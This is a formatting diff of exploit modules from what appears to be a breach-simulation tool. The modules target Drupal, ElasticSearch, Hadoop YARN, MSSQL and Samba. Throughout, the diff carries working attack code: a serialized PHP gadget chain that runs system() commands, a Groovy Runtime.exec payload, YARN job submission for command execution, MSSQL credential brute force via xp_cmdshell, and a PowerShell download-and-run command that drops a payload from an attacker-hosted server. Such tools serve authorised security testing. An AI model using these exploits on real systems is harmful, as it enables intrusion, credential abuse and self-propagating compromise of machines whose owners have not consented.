-from common.common_consts.timeouts import (LONG_REQUEST_TIMEOUT,
-                                           MEDIUM_REQUEST_TIMEOUT)
+from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
 from common.network.network_utils import remove_port
 from infection_monkey.exploit.web_rce import WebRCE
 from infection_monkey.model import ID_STRING

-__author__ = 'Ophir Harpaz'
+__author__ = "Ophir Harpaz"

 LOG = logging.getLogger(__name__)


 class DrupalExploiter(WebRCE):
-    _TARGET_OS_TYPE = ['linux', 'windows']
-    _EXPLOITED_SERVICE = 'Drupal Server'
+    _TARGET_OS_TYPE = ["linux", "windows"]
+    _EXPLOITED_SERVICE = "Drupal Server"

     def __init__(self, host):
         super(DrupalExploiter, self).__init__(host)

@@ -34,9 +33,11 @@ class DrupalExploiter(WebRCE):
         :return: the Drupal exploit config
         """
         exploit_config = super(DrupalExploiter, self).get_exploit_config()
-        exploit_config['url_extensions'] = ['node/',  # In Linux, no path is added
-                                            'drupal/node/']  # However, Bitnami installations are under /drupal
-        exploit_config['dropper'] = True
+        exploit_config["url_extensions"] = [
+            "node/",  # In Linux, no path is added
+            "drupal/node/",
+        ]  # However, Bitnami installations are under /drupal
+        exploit_config["dropper"] = True
         return exploit_config

     def add_vulnerable_urls(self, potential_urls, stop_checking=False):

@@ -51,17 +52,19 @@ class DrupalExploiter(WebRCE):
             try:
                 node_ids = find_exploitbale_article_ids(url)
                 if node_ids is None:
-                    LOG.info('Could not find a Drupal node to attack')
+                    LOG.info("Could not find a Drupal node to attack")
                     continue
                 for node_id in node_ids:
                     node_url = urljoin(url, str(node_id))
                     if self.check_if_exploitable(node_url):
-                        self.add_vuln_url(url)  # This is for report. Should be refactored in the future
+                        self.add_vuln_url(
+                            url
+                        )  # This is for report. Should be refactored in the future
                         self.vulnerable_urls.append(node_url)
                         if stop_checking:
                             break
             except Exception as e:  # We still don't know which errors to expect
-                LOG.error(f'url {url} failed in exploitability check: {e}')
+                LOG.error(f"url {url} failed in exploitability check: {e}")
         if not self.vulnerable_urls:
             LOG.info("No vulnerable urls found")

@@ -75,35 +78,39 @@ class DrupalExploiter(WebRCE):
         """
         payload = build_exploitability_check_payload(url)

-        response = requests.get(f'{url}?_format=hal_json',  # noqa: DUO123
-                                json=payload,
-                                headers={"Content-Type": "application/hal+json"},
-                                verify=False,
-                                timeout=MEDIUM_REQUEST_TIMEOUT)
+        response = requests.get(
+            f"{url}?_format=hal_json",  # noqa: DUO123
+            json=payload,
+            headers={"Content-Type": "application/hal+json"},
+            verify=False,
+            timeout=MEDIUM_REQUEST_TIMEOUT,
+        )

         if is_response_cached(response):
-            LOG.info(f'Checking if node {url} is vuln returned cache HIT, ignoring')
+            LOG.info(f"Checking if node {url} is vuln returned cache HIT, ignoring")
             return False

-        return 'INVALID_VALUE does not correspond to an entity on this site' in response.text
+        return "INVALID_VALUE does not correspond to an entity on this site" in response.text

     def exploit(self, url, command):
         # pad a easy search replace output:
-        cmd = f'echo {ID_STRING} && {command}'
+        cmd = f"echo {ID_STRING} && {command}"
         base = remove_port(url)
         payload = build_cmd_execution_payload(base, cmd)

-        r = requests.get(f'{url}?_format=hal_json',  # noqa: DUO123
-                         json=payload,
-                         headers={"Content-Type": "application/hal+json"},
-                         verify=False,
-                         timeout=LONG_REQUEST_TIMEOUT)
+        r = requests.get(
+            f"{url}?_format=hal_json",  # noqa: DUO123
+            json=payload,
+            headers={"Content-Type": "application/hal+json"},
+            verify=False,
+            timeout=LONG_REQUEST_TIMEOUT,
+        )

         if is_response_cached(r):
-            LOG.info(f'Exploiting {url} returned cache HIT, may have failed')
+            LOG.info(f"Exploiting {url} returned cache HIT, may have failed")

         if ID_STRING not in r.text:
-            LOG.warning('Command execution _may_ have failed')
+            LOG.warning("Command execution _may_ have failed")

         result = r.text.split(ID_STRING)[-1]
         return result

@@ -126,14 +133,16 @@ class DrupalExploiter(WebRCE):
         num_available_urls = len(self.vulnerable_urls)
         result = num_available_urls >= num_urls_needed_for_full_exploit
         if not result:
-            LOG.info(f'{num_urls_needed_for_full_exploit} URLs are needed to fully exploit a Drupal server '
-                     f'but only {num_available_urls} found')
+            LOG.info(
+                f"{num_urls_needed_for_full_exploit} URLs are needed to fully exploit a Drupal server "
+                f"but only {num_available_urls} found"
+            )
         return result


 def is_response_cached(r: requests.Response) -> bool:
     """ Check if a response had the cache header. """
-    return 'X-Drupal-Cache' in r.headers and r.headers['X-Drupal-Cache'] == 'HIT'
+    return "X-Drupal-Cache" in r.headers and r.headers["X-Drupal-Cache"] == "HIT"


 def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100) -> set:

@@ -141,12 +150,12 @@ def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100
     articles = set()
     while lower < upper:
         node_url = urljoin(base_url, str(lower))
-        response = requests.get(node_url,
-                                verify=False,
-                                timeout=LONG_REQUEST_TIMEOUT)  # noqa: DUO123
+        response = requests.get(
+            node_url, verify=False, timeout=LONG_REQUEST_TIMEOUT
+        )  # noqa: DUO123
         if response.status_code == 200:
             if is_response_cached(response):
-                LOG.info(f'Found a cached article at: {node_url}, skipping')
+                LOG.info(f"Found a cached article at: {node_url}, skipping")
             else:
                 articles.add(lower)
         lower += 1

@@ -155,20 +164,10 @@ def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100

 def build_exploitability_check_payload(url):
     payload = {
-        "_links": {
-            "type": {
-                "href": f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"
-            }
-        },
-        "type": {
-            "target_id": "article"
-        },
-        "title": {
-            "value": "My Article"
-        },
-        "body": {
-            "value": ""
-        }
+        "_links": {"type": {"href": f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"}},
+        "type": {"target_id": "article"},
+        "title": {"value": "My Article"},
+        "body": {"value": ""},
     }
     return payload

@@ -178,21 +177,17 @@ def build_cmd_execution_payload(base, cmd):
         "link": [
             {
                 "value": "link",
-                "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000"
-                           "GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\""
-                           "close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:"
-                           "{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";"
-                           "s:|size|:\"|command|\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000"
-                           "stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000"
-                           "GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\""
-                           "resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
-                           "".replace('|size|', str(len(cmd))).replace('|command|', cmd)
+                "options": 'O:24:"GuzzleHttp\\Psr7\\FnStream":2:{s:33:"\u0000'
+                'GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{s:5:"'
+                'close";a:2:{i:0;O:23:"GuzzleHttp\\HandlerStack":3:'
+                '{s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler";'
+                's:|size|:"|command|";s:30:"\u0000GuzzleHttp\\HandlerStack\u0000'
+                'stack";a:1:{i:0;a:1:{i:0;s:6:"system";}}s:31:"\u0000'
+                'GuzzleHttp\\HandlerStack\u0000cached";b:0;}i:1;s:7:"'
+                'resolve";}}s:9:"_fn_close";a:2:{i:0;r:4;i:1;s:7:"resolve";}}'
+                "".replace("|size|", str(len(cmd))).replace("|command|", cmd),
             }
         ],
-        "_links": {
-            "type": {
-                "href": f"{urljoin(base, '/rest/type/shortcut/default')}"
-            }
-        }
+        "_links": {"type": {"href": f"{urljoin(base, '/rest/type/shortcut/default')}"}},
     }
     return payload
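The serialized-Guzzle `options` payload above shows black's quote normalization rule: it prefers double quotes, but keeps or switches to single quotes for any literal where double quotes would force more backslash escapes, and each fragment of an implicitly concatenated string is normalized on its own. A minimal sketch with illustrative strings, not taken from this diff:

    s1 = 'plain text'     # black rewrites to: "plain text"
    s2 = "say \"hi\""     # black rewrites to: 'say "hi"' (fewer escapes win)
    s3 = 'it\'s fine'     # black rewrites to: "it's fine"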
@@ -13,12 +13,18 @@ import requests
 from common.common_consts.network_consts import ES_SERVICE
 from common.utils.attack_utils import BITS_UPLOAD_STRING, ScanStatus
 from infection_monkey.exploit.web_rce import WebRCE
-from infection_monkey.model import (BITSADMIN_CMDLINE_HTTP, CHECK_COMMAND, CMD_PREFIX, DOWNLOAD_TIMEOUT, ID_STRING,
-                                    WGET_HTTP_UPLOAD)
+from infection_monkey.model import (
+    BITSADMIN_CMDLINE_HTTP,
+    CHECK_COMMAND,
+    CMD_PREFIX,
+    DOWNLOAD_TIMEOUT,
+    ID_STRING,
+    WGET_HTTP_UPLOAD,
+)
 from infection_monkey.network.elasticfinger import ES_PORT
 from infection_monkey.telemetry.attack.t1197_telem import T1197Telem

-__author__ = 'danielg, VakarisZ'
+__author__ = "danielg, VakarisZ"

 LOG = logging.getLogger(__name__)

@@ -26,21 +32,28 @@ LOG = logging.getLogger(__name__)
 class ElasticGroovyExploiter(WebRCE):
     # attack URLs
     MONKEY_RESULT_FIELD = "monkey_result"
-    GENERIC_QUERY = '''{"size":1, "script_fields":{"%s": {"script": "%%s"}}}''' % MONKEY_RESULT_FIELD
-    JAVA_CMD = \
-        GENERIC_QUERY % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
+    GENERIC_QUERY = (
+        """{"size":1, "script_fields":{"%s": {"script": "%%s"}}}""" % MONKEY_RESULT_FIELD
+    )
+    JAVA_CMD = (
+        GENERIC_QUERY
+        % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
+    )

-    _TARGET_OS_TYPE = ['linux', 'windows']
-    _EXPLOITED_SERVICE = 'Elastic search'
+    _TARGET_OS_TYPE = ["linux", "windows"]
+    _EXPLOITED_SERVICE = "Elastic search"

     def __init__(self, host):
         super(ElasticGroovyExploiter, self).__init__(host)

     def get_exploit_config(self):
         exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config()
-        exploit_config['dropper'] = True
-        exploit_config['url_extensions'] = ['_search?pretty']
-        exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP}
+        exploit_config["dropper"] = True
+        exploit_config["url_extensions"] = ["_search?pretty"]
+        exploit_config["upload_commands"] = {
+            "linux": WGET_HTTP_UPLOAD,
+            "windows": CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP,
+        }
         return exploit_config

     def get_open_service_ports(self, port_list, names):

@@ -56,7 +69,9 @@ class ElasticGroovyExploiter(WebRCE):
         try:
             response = requests.get(url, data=payload, timeout=DOWNLOAD_TIMEOUT)
         except requests.ReadTimeout:
-            LOG.error("Elastic couldn't upload monkey, because server didn't respond to upload request.")
+            LOG.error(
+                "Elastic couldn't upload monkey, because server didn't respond to upload request."
+            )
             return False
         result = self.get_results(response)
         if not result:

@@ -65,7 +80,7 @@ class ElasticGroovyExploiter(WebRCE):

     def upload_monkey(self, url, commands=None):
         result = super(ElasticGroovyExploiter, self).upload_monkey(url, commands)
-        if 'windows' in self.host.os['type'] and result:
+        if "windows" in self.host.os["type"] and result:
             T1197Telem(ScanStatus.USED, self.host, BITS_UPLOAD_STRING).send()
         return result

@@ -76,14 +91,14 @@ class ElasticGroovyExploiter(WebRCE):
         """
         try:
             json_resp = json.loads(response.text)
-            return json_resp['hits']['hits'][0]['fields'][self.MONKEY_RESULT_FIELD]
+            return json_resp["hits"]["hits"][0]["fields"][self.MONKEY_RESULT_FIELD]
         except (KeyError, IndexError):
             return None

     def check_if_exploitable(self, url):
         # Overridden web_rce method that adds CMD prefix for windows command
         try:
-            if 'windows' in self.host.os['type']:
+            if "windows" in self.host.os["type"]:
                 resp = self.exploit(url, CMD_PREFIX + " " + CHECK_COMMAND)
             else:
                 resp = self.exploit(url, CHECK_COMMAND)
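`GENERIC_QUERY` and `JAVA_CMD` above illustrate another rule: when an assignment no longer fits on one line, black drops backslash continuations in favor of a parenthesized expression and breaks before binary operators, so the `%` lands at the start of the continuation line. A minimal sketch with hypothetical names:

    TEMPLATE = '{"query": "%s"}'

    # Before (assumed input style): backslash continuation
    # QUERY = \
    #     TEMPLATE % "a long payload that pushes the assignment past the line limit..."

    # After black: parenthesized, with the operator leading the continuation line
    QUERY = (
        TEMPLATE
        % "a long payload that pushes the assignment past the line limit, hence the wrap"
    )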
@@ -15,16 +15,21 @@ from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get
 from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
 from infection_monkey.exploit.tools.http_tools import HTTPTools
 from infection_monkey.exploit.web_rce import WebRCE
-from infection_monkey.model import HADOOP_LINUX_COMMAND, HADOOP_WINDOWS_COMMAND, ID_STRING, MONKEY_ARG
+from infection_monkey.model import (
+    HADOOP_LINUX_COMMAND,
+    HADOOP_WINDOWS_COMMAND,
+    ID_STRING,
+    MONKEY_ARG,
+)

-__author__ = 'VakarisZ'
+__author__ = "VakarisZ"

 LOG = logging.getLogger(__name__)


 class HadoopExploiter(WebRCE):
-    _TARGET_OS_TYPE = ['linux', 'windows']
-    _EXPLOITED_SERVICE = 'Hadoop'
+    _TARGET_OS_TYPE = ["linux", "windows"]
+    _EXPLOITED_SERVICE = "Hadoop"
     HADOOP_PORTS = [["8088", False]]
     # How long we have our http server open for downloads in seconds
     DOWNLOAD_TIMEOUT = 60

@@ -41,13 +46,13 @@ class HadoopExploiter(WebRCE):
         if not self.vulnerable_urls:
             return False
         # We presume hadoop works only on 64-bit machines
-        if self.host.os['type'] == 'windows':
-            self.host.os['machine'] = '64'
+        if self.host.os["type"] == "windows":
+            self.host.os["machine"] = "64"
         paths = self.get_monkey_paths()
         if not paths:
             return False
-        http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths['src_path'])
-        command = self.build_command(paths['dest_path'], http_path)
+        http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths["src_path"])
+        command = self.build_command(paths["dest_path"], http_path)
         if not self.exploit(self.vulnerable_urls[0], command):
             return False
         http_thread.join(self.DOWNLOAD_TIMEOUT)

@@ -57,35 +62,47 @@ class HadoopExploiter(WebRCE):

     def exploit(self, url, command):
         # Get the newly created application id
-        resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/new-application"),
-                             timeout=LONG_REQUEST_TIMEOUT)
+        resp = requests.post(
+            posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT
+        )
         resp = json.loads(resp.content)
-        app_id = resp['application-id']
+        app_id = resp["application-id"]
         # Create a random name for our application in YARN
-        rand_name = ID_STRING + "".join([random.choice(string.ascii_lowercase) for _ in range(self.RAN_STR_LEN)])
+        rand_name = ID_STRING + "".join(
+            [random.choice(string.ascii_lowercase) for _ in range(self.RAN_STR_LEN)]
+        )
         payload = self.build_payload(app_id, rand_name, command)
-        resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT)
+        resp = requests.post(
+            posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT
+        )
         return resp.status_code == 202

     def check_if_exploitable(self, url):
         try:
-            resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/new-application"),
-                                 timeout=LONG_REQUEST_TIMEOUT)
+            resp = requests.post(
+                posixpath.join(url, "ws/v1/cluster/apps/new-application"),
+                timeout=LONG_REQUEST_TIMEOUT,
+            )
         except requests.ConnectionError:
             return False
         return resp.status_code == 200

     def build_command(self, path, http_path):
         # Build command to execute
-        monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1,
-                                              vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0])
-        if 'linux' in self.host.os['type']:
+        monkey_cmd = build_monkey_commandline(
+            self.host, get_monkey_depth() - 1, vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0]
+        )
+        if "linux" in self.host.os["type"]:
             base_command = HADOOP_LINUX_COMMAND
         else:
             base_command = HADOOP_WINDOWS_COMMAND

-        return base_command % {"monkey_path": path, "http_path": http_path,
-                               "monkey_type": MONKEY_ARG, "parameters": monkey_cmd}
+        return base_command % {
+            "monkey_path": path,
+            "http_path": http_path,
+            "monkey_type": MONKEY_ARG,
+            "parameters": monkey_cmd,
+        }

     @staticmethod
     def build_payload(app_id, name, command):

@@ -97,6 +114,6 @@ class HadoopExploiter(WebRCE):
                 "command": command,
             }
         },
-        "application-type": "YARN"
+        "application-type": "YARN",
     }
     return payload
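The `from infection_monkey.model import (...)` rewrite above is black's standard treatment of an over-long import: parenthesize, put one name per line in the order given (black does not sort imports; that is isort's job), and end with a trailing comma. A minimal runnable sketch using a stdlib module whose one-line form would overrun 88 columns:

    from os.path import (
        abspath,
        basename,
        dirname,
        exists,
        expanduser,
        expandvars,
        getsize,
        isdir,
        isfile,
        join,
        normpath,
        realpath,
    )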
@@ -8,7 +8,11 @@ import pymssql
 from common.utils.exceptions import ExploitingVulnerableMachineError, FailedExploitationError
 from common.utils.exploit_enum import ExploitType
 from infection_monkey.exploit.HostExploiter import HostExploiter
-from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_monkey_dest_path
+from infection_monkey.exploit.tools.helpers import (
+    build_monkey_commandline,
+    get_monkey_depth,
+    get_monkey_dest_path,
+)
 from infection_monkey.exploit.tools.http_tools import MonkeyHTTPServer
 from infection_monkey.exploit.tools.payload_parsing import LimitedSizePayload
 from infection_monkey.model import DROPPER_ARG

@@ -17,33 +21,37 @@ LOG = logging.getLogger(__name__)


 class MSSQLExploiter(HostExploiter):
-    _EXPLOITED_SERVICE = 'MSSQL'
-    _TARGET_OS_TYPE = ['windows']
+    _EXPLOITED_SERVICE = "MSSQL"
+    _TARGET_OS_TYPE = ["windows"]
     EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
     LOGIN_TIMEOUT = 15
     # Time in seconds to wait between MSSQL queries.
     QUERY_BUFFER = 0.5
-    SQL_DEFAULT_TCP_PORT = '1433'
+    SQL_DEFAULT_TCP_PORT = "1433"

     # Temporary file that saves commands for monkey's download and execution.
-    TMP_FILE_NAME = 'tmp_monkey.bat'
+    TMP_FILE_NAME = "tmp_monkey.bat"
     TMP_DIR_PATH = "%temp%\\tmp_monkey_dir"

     MAX_XP_CMDSHELL_COMMAND_SIZE = 128

-    XP_CMDSHELL_COMMAND_START = "xp_cmdshell \""
-    XP_CMDSHELL_COMMAND_END = "\""
+    XP_CMDSHELL_COMMAND_START = 'xp_cmdshell "'
+    XP_CMDSHELL_COMMAND_END = '"'
     EXPLOIT_COMMAND_PREFIX = "<nul set /p="
     EXPLOIT_COMMAND_SUFFIX = ">>{payload_file_path}"
     CREATE_COMMAND_SUFFIX = ">{payload_file_path}"
-    MONKEY_DOWNLOAD_COMMAND = "powershell (new-object System.Net.WebClient)." \
-                              "DownloadFile(^\'{http_path}^\' , ^\'{dst_path}^\')"
+    MONKEY_DOWNLOAD_COMMAND = (
+        "powershell (new-object System.Net.WebClient)."
+        "DownloadFile(^'{http_path}^' , ^'{dst_path}^')"
+    )

     def __init__(self, host):
         super(MSSQLExploiter, self).__init__(host)
         self.cursor = None
         self.monkey_server = None
-        self.payload_file_path = os.path.join(MSSQLExploiter.TMP_DIR_PATH, MSSQLExploiter.TMP_FILE_NAME)
+        self.payload_file_path = os.path.join(
+            MSSQLExploiter.TMP_DIR_PATH, MSSQLExploiter.TMP_FILE_NAME
+        )

     def _exploit_host(self):
         """

@@ -52,7 +60,9 @@ class MSSQLExploiter(HostExploiter):
         """
         # Brute force to get connection
         username_passwords_pairs_list = self._config.get_exploit_user_password_pairs()
-        self.cursor = self.brute_force(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list)
+        self.cursor = self.brute_force(
+            self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list
+        )

         # Create dir for payload
         self.create_temp_dir()

@@ -80,11 +90,15 @@ class MSSQLExploiter(HostExploiter):
         return self.run_mssql_command(file_running_command)

     def create_temp_dir(self):
-        dir_creation_command = MSSQLLimitedSizePayload(command="mkdir {}".format(MSSQLExploiter.TMP_DIR_PATH))
+        dir_creation_command = MSSQLLimitedSizePayload(
+            command="mkdir {}".format(MSSQLExploiter.TMP_DIR_PATH)
+        )
         self.run_mssql_command(dir_creation_command)

     def create_empty_payload_file(self):
-        suffix = MSSQLExploiter.CREATE_COMMAND_SUFFIX.format(payload_file_path=self.payload_file_path)
+        suffix = MSSQLExploiter.CREATE_COMMAND_SUFFIX.format(
+            payload_file_path=self.payload_file_path
+        )
         tmp_file_creation_command = MSSQLLimitedSizePayload(command="NUL", suffix=suffix)
         self.run_mssql_command(tmp_file_creation_command)

@@ -111,9 +125,13 @@ class MSSQLExploiter(HostExploiter):

     def remove_temp_dir(self):
         # Remove temporary dir we stored payload at
-        tmp_file_removal_command = MSSQLLimitedSizePayload(command="del {}".format(self.payload_file_path))
+        tmp_file_removal_command = MSSQLLimitedSizePayload(
+            command="del {}".format(self.payload_file_path)
+        )
         self.run_mssql_command(tmp_file_removal_command)
-        tmp_dir_removal_command = MSSQLLimitedSizePayload(command="rmdir {}".format(MSSQLExploiter.TMP_DIR_PATH))
+        tmp_dir_removal_command = MSSQLLimitedSizePayload(
+            command="rmdir {}".format(MSSQLExploiter.TMP_DIR_PATH)
+        )
         self.run_mssql_command(tmp_dir_removal_command)

     def start_monkey_server(self):

@@ -131,25 +149,29 @@ class MSSQLExploiter(HostExploiter):
     def get_monkey_launch_command(self):
         dst_path = get_monkey_dest_path(self.monkey_server.http_path)
         # Form monkey's launch command
-        monkey_args = build_monkey_commandline(self.host,
-                                               get_monkey_depth() - 1,
-                                               MSSQLExploiter.SQL_DEFAULT_TCP_PORT,
-                                               dst_path)
+        monkey_args = build_monkey_commandline(
+            self.host, get_monkey_depth() - 1, MSSQLExploiter.SQL_DEFAULT_TCP_PORT, dst_path
+        )
         suffix = ">>{}".format(self.payload_file_path)
         prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
-        return MSSQLLimitedSizePayload(command="{} {} {}".format(dst_path, DROPPER_ARG, monkey_args),
-                                       prefix=prefix,
-                                       suffix=suffix)
+        return MSSQLLimitedSizePayload(
+            command="{} {} {}".format(dst_path, DROPPER_ARG, monkey_args),
+            prefix=prefix,
+            suffix=suffix,
+        )

     def get_monkey_download_command(self):
         dst_path = get_monkey_dest_path(self.monkey_server.http_path)
-        monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND. \
-            format(http_path=self.monkey_server.http_path, dst_path=dst_path)
+        monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format(
+            http_path=self.monkey_server.http_path, dst_path=dst_path
+        )
         prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
-        suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(payload_file_path=self.payload_file_path)
-        return MSSQLLimitedSizePayload(command=monkey_download_command,
-                                       suffix=suffix,
-                                       prefix=prefix)
+        suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(
+            payload_file_path=self.payload_file_path
+        )
+        return MSSQLLimitedSizePayload(
+            command=monkey_download_command, suffix=suffix, prefix=prefix
+        )

     def brute_force(self, host, port, users_passwords_pairs_list):
         """

@@ -170,10 +192,14 @@ class MSSQLExploiter(HostExploiter):
         try:
             # Core steps
             # Trying to connect
-            conn = pymssql.connect(host, user, password, port=port, login_timeout=self.LOGIN_TIMEOUT)
+            conn = pymssql.connect(
+                host, user, password, port=port, login_timeout=self.LOGIN_TIMEOUT
+            )
             LOG.info(
-                'Successfully connected to host: {0}, using user: {1}, password (SHA-512): {2}'.format(
-                    host, user, self._config.hash_sensitive_data(password)))
+                "Successfully connected to host: {0}, using user: {1}, password (SHA-512): {2}".format(
+                    host, user, self._config.hash_sensitive_data(password)
+                )
+            )
             self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT)
             self.report_login_attempt(True, user, password)
             cursor = conn.cursor()

@@ -183,14 +209,20 @@ class MSSQLExploiter(HostExploiter):
             # Combo didn't work, hopping to the next one
             pass

-        LOG.warning('No user/password combo was able to connect to host: {0}:{1}, '
-                    'aborting brute force'.format(host, port))
-        raise FailedExploitationError("Bruteforce process failed on host: {0}".format(self.host.ip_addr))
+        LOG.warning(
+            "No user/password combo was able to connect to host: {0}:{1}, "
+            "aborting brute force".format(host, port)
+        )
+        raise FailedExploitationError(
+            "Bruteforce process failed on host: {0}".format(self.host.ip_addr)
+        )


 class MSSQLLimitedSizePayload(LimitedSizePayload):
     def __init__(self, command, prefix="", suffix=""):
-        super(MSSQLLimitedSizePayload, self).__init__(command=command,
-                                                      max_length=MSSQLExploiter.MAX_XP_CMDSHELL_COMMAND_SIZE,
-                                                      prefix=MSSQLExploiter.XP_CMDSHELL_COMMAND_START + prefix,
-                                                      suffix=suffix + MSSQLExploiter.XP_CMDSHELL_COMMAND_END)
+        super(MSSQLLimitedSizePayload, self).__init__(
+            command=command,
+            max_length=MSSQLExploiter.MAX_XP_CMDSHELL_COMMAND_SIZE,
+            prefix=MSSQLExploiter.XP_CMDSHELL_COMMAND_START + prefix,
+            suffix=suffix + MSSQLExploiter.XP_CMDSHELL_COMMAND_END,
+        )
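Two details in the MSSQL hunk above are easy to misread as behavior changes but are not: `MONKEY_DOWNLOAD_COMMAND. \` loses its backslash continuation (black reattaches `.format(...)` to the attribute and wraps the arguments inside the parentheses instead), and the xp_cmdshell constants trade escaped quotes for the opposite quote style, which is byte-identical at runtime. A minimal sketch with hypothetical names:

    DOWNLOAD_TEMPLATE = "powershell DownloadFile(^'{http_path}^' , ^'{dst_path}^')"

    # Before (assumed input style):
    # command = DOWNLOAD_TEMPLATE. \
    #     format(http_path=http_path, dst_path=dst_path)

    # After black: no backslash continuation, call stays attached to the attribute
    http_path, dst_path = "http://10.0.0.1:8080/x", "C:\\Windows\\Temp\\m.exe"
    command = DOWNLOAD_TEMPLATE.format(http_path=http_path, dst_path=dst_path)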
@@ -8,24 +8,46 @@ from io import BytesIO
 import impacket.smbconnection
 from impacket.nmb import NetBIOSError
 from impacket.nt_errors import STATUS_SUCCESS
-from impacket.smb import (FILE_DIRECTORY_FILE, FILE_NON_DIRECTORY_FILE, FILE_OPEN, FILE_READ_DATA, FILE_SHARE_READ,
-                          FILE_WRITE_DATA, SMB, SMB_DIALECT, SessionError, SMBCommand, SMBNtCreateAndX_Data,
-                          SMBNtCreateAndX_Parameters)
-from impacket.smb3structs import (SMB2_CREATE, SMB2_FLAGS_DFS_OPERATIONS, SMB2_IL_IMPERSONATION, SMB2_OPLOCK_LEVEL_NONE,
-                                  SMB2Create, SMB2Create_Response, SMB2Packet)
+from impacket.smb import (
+    FILE_DIRECTORY_FILE,
+    FILE_NON_DIRECTORY_FILE,
+    FILE_OPEN,
+    FILE_READ_DATA,
+    FILE_SHARE_READ,
+    FILE_WRITE_DATA,
+    SMB,
+    SMB_DIALECT,
+    SessionError,
+    SMBCommand,
+    SMBNtCreateAndX_Data,
+    SMBNtCreateAndX_Parameters,
+)
+from impacket.smb3structs import (
+    SMB2_CREATE,
+    SMB2_FLAGS_DFS_OPERATIONS,
+    SMB2_IL_IMPERSONATION,
+    SMB2_OPLOCK_LEVEL_NONE,
+    SMB2Create,
+    SMB2Create_Response,
+    SMB2Packet,
+)
 from impacket.smbconnection import SMBConnection

 import infection_monkey.monkeyfs as monkeyfs
 from common.utils.attack_utils import ScanStatus
 from infection_monkey.exploit.HostExploiter import HostExploiter
-from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_target_monkey_by_os
+from infection_monkey.exploit.tools.helpers import (
+    build_monkey_commandline,
+    get_monkey_depth,
+    get_target_monkey_by_os,
+)
 from infection_monkey.model import DROPPER_ARG
 from infection_monkey.network.smbfinger import SMB_SERVICE
 from infection_monkey.network.tools import get_interface_to_target
 from infection_monkey.pyinstaller_utils import get_binary_file_path
 from infection_monkey.telemetry.attack.t1105_telem import T1105Telem

-__author__ = 'itay.mizeretz'
+__author__ = "itay.mizeretz"

 LOG = logging.getLogger(__name__)

@@ -36,7 +58,7 @@ class SambaCryExploiter(HostExploiter):
     https://github.com/CoreSecurity/impacket/blob/master/examples/sambaPipe.py
     """

-    _TARGET_OS_TYPE = ['linux']
+    _TARGET_OS_TYPE = ["linux"]
     _EXPLOITED_SERVICE = "Samba"
     # Name of file which contains the monkey's commandline
     SAMBACRY_COMMANDLINE_FILENAME = "monkey_commandline.txt"

@@ -65,8 +87,10 @@ class SambaCryExploiter(HostExploiter):
             return False

         writable_shares_creds_dict = self.get_writable_shares_creds_dict(self.host.ip_addr)
-        LOG.info("Writable shares and their credentials on host %s: %s" %
-                 (self.host.ip_addr, str(writable_shares_creds_dict)))
+        LOG.info(
+            "Writable shares and their credentials on host %s: %s"
+            % (self.host.ip_addr, str(writable_shares_creds_dict))
+        )

         self.exploit_info["shares"] = {}
         for share in writable_shares_creds_dict:

@@ -79,16 +103,25 @@ class SambaCryExploiter(HostExploiter):
         successfully_triggered_shares = []

         for share in writable_shares_creds_dict:
-            trigger_result = self.get_trigger_result(self.host.ip_addr, share, writable_shares_creds_dict[share])
+            trigger_result = self.get_trigger_result(
+                self.host.ip_addr, share, writable_shares_creds_dict[share]
+            )
             creds = writable_shares_creds_dict[share]
             self.report_login_attempt(
-                trigger_result is not None, creds['username'], creds['password'], creds['lm_hash'], creds['ntlm_hash'])
+                trigger_result is not None,
